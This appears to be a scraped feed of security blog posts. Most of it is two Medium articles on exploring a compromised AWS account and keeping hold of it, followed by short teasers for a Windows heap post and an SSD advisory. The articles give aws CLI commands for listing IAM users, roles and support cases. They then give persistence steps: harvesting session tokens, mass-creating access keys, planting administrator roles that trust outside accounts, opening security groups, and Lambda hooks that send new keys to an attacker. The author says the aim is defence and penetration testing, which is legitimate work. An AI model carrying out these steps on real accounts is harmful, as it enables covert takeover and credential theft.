Any deny rules are valuable in that they provide a ready made target list of things your target does not want outsiders to access. As you might expect, the rules are manageable through API. Protocol numbers are as per the IANA Assigned Internet Protocol Numbers, and -1 is a wildcard for all protocols.

"-1 allow"
"6 deny"
"6 deny"

As an aside. Amazon appears to have made a blunder bundling bazillions (alliteration achievement attained) of extraneous API functions into the EC2 API namespace. It is both common and easy to write lazy AWS policies that allow all actions to be executed in a particular API. For example:

"Action": "ec2:*"

One final query worth running to get a better sense of the network is to ask Route53 for all of the hosted zones.

aws route53 list-hosted-zones | jq '.HostedZones [] .Name'

As you might expect, this produces a simple of domain names owned by your target and controlled in AWS.


After you’ve mapped all the networky bits, it’s time to move on to identities and access.

AWS Identity and Access Management (IAM) is a web service that you can use to manage users and user permissions under your AWS account.

IAM is where a lot of the magic and good stuff lives. It’s extremely complicated but extremely powerful, and likely where you will be investing a lot of your reconnaissance and persistence efforts.

Listing users will give you a feel for both the size of the account and the scope of attack surface.

aws iam list-users | jq '.Users [] .Arn'

People tend to name users using either their identity or the intended purpose of the account.


In large enterprise accounts you may find yourself in the odd situation of the user list being tiny. That could be because authentication is federated via a SAML provider. To reveal this situation, list the identity providers using the IAM API.

aws iam list-saml-providers | jq ‘.SAMLProviderList [] .Arn’

Most of the major 3rd party identity services integrate seamlessly with AWS so its not unusual for one of those to be returned.


The SAML provider an organisation uses for AWS authentication is highly correlated with the provider they use for other cloud services and internal systems — Yay for single sign-on. Knowing this can dramatically change other tactics you employ and reduce rage from banging your head against an invisible 2FA brick wall.

However, the true power of IAM is in roles. Roles are assumed by users authenticating via SAML. Roles are how Amazon recommends you start your EC2 instances and how it forces you to work in newer services like Lambda. Roles are the magic that gives you keyless API calls. Roles are the future.

You can use roles to delegate access to users, applications, or services that don’t normally have access to your AWS resources. For example, you might want to grant users in your AWS account access to resources they don’t usually have, or grant users in one AWS account access to resources in another account. Or you might want to allow a mobile app to use AWS resources… Sometimes you want to give AWS access to users who already have identities defined outside of AWS, such as in your corporate directory. Or, you might want to grant access to your account to third parties so that they can perform an audit on your resources.

If roles are the future, the ‘list-roles’ function is the Almanac from Back to the Future Part II.

aws iam list-roles | jq '.Roles [] .Arn'

In general role names also tend to be quite descriptive. The full list of role ARNs is critical in escalating privileges and moving laterally within AWS.


Conveniently, if you are bored and want to go through all user, role, and policy data with a fine-tooth comb (the hyphen is important because I’m not sure what you’d do with a fine tooth-comb?!), there’s an API to retrieve all the details at once.

aws iam get-account-authorization-details

Finally, while SSH key pairs aren’t strictly part of IAM — they are predictably part of EC2 — they are another identifier that can help with mapping how an organisation deals with access.

aws ec2 describe-key-pairs | jq '.[][] .KeyName'

You should see a list of key names, which might tell you who has access to resources and for what purpose. Shared keys might make for good targets.


AWS has a pretty extensive and easy to use support program, accessible from the web interface. It turns out that the typical message based support interaction provided by the web interface, is just a thin layer over yet another API.

The AWS Support API reference is intended for programmers who need detailed information about the AWS Support operations and data types. This service enables you to manage your AWS Support cases programmatically.

You can list support cases to gather interesting intelligence about what the account administrators are attempting to resolve and identify areas of concern.

aws support describe-cases --include-resolved-cases | jq '.cases [] | .subject'

… Like a a compromise of their AWS account.

"Limit Increase: EC2 Instances"
"My password doesn't work - please set it to hunter2."
"I think someone hacked our AWS account"

At this point, you might consider easing the stress on overworked Amazon support staff by closing any such cases with a comment like, “Nvm dudez, it waz just our Nessus boxen gone rogue”.

Within a single account, support cases are often logged by many users, and those cases can spiral into big CC chains. This provides an opporunity to gather email addresses to target in later activity.

aws support describe-cases --include-resolved-cases | jq '.cases [] | .submittedBy, .ccEmailAddresses []' | sort | uniq

This article was written under the assumption you have access to an AWS API key or role with some reasonably broad permissions, and an up-to-date installed awsclijq.

More importantly, it was written to enlighten AWS account administrators and improve legitimate penetration testing TTPs. In fact, as I wrote this article, engineers at my workplace implemented mitigations, detection logic and tests for gaps this work identified. Regardless, let’s not fool ourselves, our foes are already Internet Explorers of the Highest Order of Business Excellence. They are setting sail in our clouds right now.


Exploring an AWS account post-compromise was originally published in Cyber Free on Medium, where people are continuing the conversation by highlighting and responding to this story.


Read the responses to this story on Medium.

Backdooring an AWS account

So you’ve pwned an AWS account — congratulations — now what? You’re eager to get to the data theft, amirite? Not so fast whipper snapper, have you disrupted logging? Do you know what you have? Sweet! Time to get settled in.

Maintaining persistence in AWS is only limited by your imagination but there are few obvious and oft used techniques everyone should know and watch for.

No one wants to get locked out before mid hack so grab yourself some temporary credentials.

aws sts get-session-token --duration-seconds 129600
Acceptable durations for IAM user sessions range from 900 seconds (15 minutes) to 129600 seconds (36 hours), with 43200 seconds (12 hours) as the default. Sessions for AWS account owners are restricted to a maximum of 3600 seconds (one hour). If the duration is longer than one hour, the session for AWS account owners defaults to one hour.

You’ll want to setup a cron job to do this regularly from here on out. It might sound crazy, but it ain’t no lie. Baby, bye, bye, bye (Sorry got distracted). A sensible person might assume that deleting a compromised access key is a reasonable way to expunge an attacker. Alas, disabling or deleting the original access key does not kill any temporary credentials created with the original. So if you find yourself ousted, you may still get somewhere between 0 and 36 hours to recover.

There are some limitations:

  • You cannot call any IAM APIs unless MFA authentication information is included in the request.
  • You cannot call any STS API except assume-role.

That does create an annoyance but an annoyance that’s trivially overcome. Assuming another role is an API call away. Spinning up compute running under another execution role or instance profile, that can call IAM, is almost as easy.

The best (worst?) part however, is that temporary session keys don’t show up anywhere. Checking the web interface or running “aws iam list-access-keys” is ineffective. There’s no “list-session-tokens” or “delete-session-token” to go along with “get-session-token”. There have been more sitings of the Loch Ness Monster in the wild than AWS session tokens.

This is the entire STS API at time of writing.

I really do hope Amazon does something about this soon. Having someone use the force instead of the API within the accounts I’m responsible for genuinely scares me.

Now that you have insurance, it’s time to burrow in. If being loud and drunk is your cup of Malört, you could just create a new user and access key. Make it look like an existing user, kind of like typo-squatting, and you’ll have yourself a genuine lying-dormant cyber pathogen.

Busting out a new user and key takes two one-liners. Some might call it a two-liner but I’m not into that kind of thing.

aws iam create-user --user-name [my-user]
aws iam create-access-key --user-name [my-user]

In response, you’ll receive an access key ID and a secret access key, which you’ll want to take note of.

"AccessKey": {
"UserName": "[my-user]",
"Status": "Active",
"SecretAccessKey": "hunter2",

That approach is nice but it’s not the kind of persistent persistence you want. Should the user or access key get discovered, it will take half the API calls to kill them that it did to create them. You’ll be left with only stories about how you used to hack things when you were young. I’ll be waiting for you there with my cup of washed-up sadness.

Instead of creating a new account, it’s more effective to create a new access key for every user in bulk. Bonus points to those who acquire temporary session tokens at the same time.

The code to do it is straightforward. Even a manager (like me) can write it.

The error handling is somewhat important here as the default key limit per user is two and you will bump up against it semi regularly. Additionally, all access keys have visible creation timestamps which make them easy to spot during a review. Another limitation is that federated (SAML authenticated) users won’t be affected as they integrate with roles rather than user accounts.

At this point any good auditor would claim that this was merely a point-in-time activity, leaving potentially risky compliance gaps when new accounts are created in the future. Alas feisty auditors, there is a solution!

Just create a Lambda function that reacts to user creations via a CloudWatch Event Rule and automagically adds a disaster recovery access key and posts it to a PCI-DSS compliant location of your choosing.

AWS Lambda is a server-less compute thingy (only precise technical terms allowed) that runs a function immediately in response to events and automatically manages the underlying infrastructure. CloudWatch Event Rules are a mechanism for notifying other AWS services of state changes in resources in near real time. They have a very natural relationship as CloudWatch provides the sub-system for monitoring AWS API calls and invoking Lambda functions that execute self-contained business logic.

The API calls and deployment packaging required to setup a Lambda function are a bit convoluted but well documented. You can plough through manually and gain valuable plough experience or use a framework like Serverless to avoid unnecessary wear on your delicate hands. Just ensure the function’s execute role has the “iam:CreateAccessKey” permission.

Users are so 90s though! Like the Backstreet Boys. Not like Michael Bolten. He’s timeless. I mean, how am I supposed to live without him? Now that I’ve been lovin’ him so long.

The AWS recommended ISO* compliant method for escalating privileges is to use the STS assume role API call. Amazon describes it so perfectly, I would be robbing you by not quoting it directly.

For cross-account access, imagine that you own multiple accounts and need to access resources in each account. You could create long-term credentials in each account to access those resources. However, managing all those credentials and remembering which one can access which account can be time consuming. Instead, you can create one set of long-term credentials in one account and then use temporary security credentials to access all the other accounts by assuming roles in those accounts.

Sold! First, create the role.

aws iam create-role \
--role-name [my-role] \
--assume-role-policy-document [file://assume-role-policy.json]

The assume role policy document must include the ARN of the users, roles or accounts that will be accessing the backdoored role. It’s best to specify “[account-id]:root”, which acts as a wild card for all users and roles in a given account.

"Version": "2012-10-17",
"Statement": [
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[account-id]:root"
"Action": "sts:AssumeRole"

Then attach a policy to the backdoored role describing the actions it can perform. All of them, IMHO. The pre-canned “AdministratorAccess” policy works a treat as it is analogous to root.

aws iam attach-role-policy \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess \
--role-name [my-role]

There you have it, a freshly minted role to assume from your other pwned accounts without the hassle of all of managing those pesky extra credentials.

While elegant, this approach does have its disadvantages. At some point in the chain of role assumptions, access credentials are required. In the event those credentials or pwned accounts are discovered and purged, your access will die with them.

As before, it’s more effective to backdoor the existing roles in an account than create new ones. The code is trickier this time because it requires massaging of existing assume role policies and their structural edge cases. I’ve tried to comment them fully in the code below but edge cases may have been missed.

While adding adding access keys to a user leaves a trail of recent creation timestamps, by default there is no easy way to identify which part of a policy has been modified. Defenders may be able to identify that a policy has been changed, but without external record keeping of previous policy versions, they will be left to comb through each policy to look for bad account trusts. This is made more difficult through randomisation of source account ARNs.

Finally, to future proof it all, create a Lambda function that responds to role creations via a CloudWatch Event Rule. As with the access key example, the below code posts the backdoored ARN to a location of your choosing. You may also want to send the role’s permissions and source ARN.

If you were less lazy than me, you could make the code react to UpdateAssumeRolePolicy calls and reintroduce backdoors that are removed.

Sometimes you’ll want to maintain access to live resources rather than the AWS API. For those situations there’s one other basic access persistence tactic worth discussing in an introductory piece, security groups. Security groups tend to get in the way of such things; SSH and database ports aren’t typically accessible to the Internet.

A security group acts as a virtual firewall for your instance to control inbound and outbound traffic. When you launch an instance in a VPC, you can assign the instance to up to five security groups. Security groups act at the instance level, not the subnet level. Therefore, each instance in a subnet in your VPC could be assigned to a different set of security groups.

In practice, “instances” is broader than just EC2. Security groups could be applied to Lambda functions, RDS databases, and other resources that support VPCs.

By now you know the drill. Creating a new security group or rule and applying it to one or two resources is okay but let’s skip that step and just do all of them. Shockingly (can I be shocked by own set definitions?), “all of them” includes the default security group. This is important because if a resource does not have a security group associated with it, the default security group is implicitly associated.

Some older accounts still have services running “EC2 Classic” mode, which means that modifying only EC2 security groups is not sufficient. Back in the day RDS, ElastiCache, and Redshift had their own implementations of security groups. Their relevant authorise functions would need to be called to get full security group coverage:

  • authorize_db_security_group_ingress
  • authorize_cache_security_group_ingress
  • authorize_cluster_security_group_ingress

This approach has been phased out. In fact, accounts created after 4th December 2013 cannot use EC2 Classic at all.

Finally, complete the circle of life with a Lambda function that executes when create security group CloudWatch Event Rules are fired.

The extra access rules are pretty easy to spot just by eyeballing the security group. However, the workflow for creating a security group via the web console involves defining all the rules prior to actually calling the API. Consequently, unless someone returns to refine a security group, they are unlikely to notice the extra line item.

Between this and the other tactics, you should be well untruly entrenched in a pwned AWS account. You might not be a devil worm but you are certainly a wombat. An AWS WOMBAT!

It is obvious that information could be used for good and evil. I used it to strengthen the security posture of accounts I am responsible for and make detection processes testable. Professional penetration testers will use it to mimic real world attackers in their engagements. Please do the same. Don’t be evil.

Whatever your choice, none of this is unattainable to even the scriptiest (anyone know why there’s a red underline under that word? hmmm) of script kiddies. It’s better for everyone to have access to the knowledge then just the bad guys.


Backdooring an AWS account was originally published in Cyber Free on Medium, where people are continuing the conversation by highlighting and responding to this story.


Read the responses to this story on Medium.

Windows 10 x86/wow64 Userland heap

Introduction Hi all, Over the course of the past few weeks ago, I received a number of "emergency" calls from some relatives, asking me to look at their computer because "things were broken", "things looked different" and "I think my computer got hacked".  I quickly realized that their computers got upgraded to Windows 10. We […]

SSD Advisory – Teco SG2 and TP3 Vulnerabililites

Vulnerabilities Description Multiple vulnerabilities have been found in Teco’s SG2 and TP3 product, these vulnerabilities allows attackers that are able to supply the products with a specially crafted file to cause it to execute arbitrary code. TECO TP3 PC-LINK tpc file parsing Stack Buffer Overflow Code Execution TECO uses their own propriety file format known … Continue reading SSD Advisory – Teco SG2 and TP3 Vulnerabililites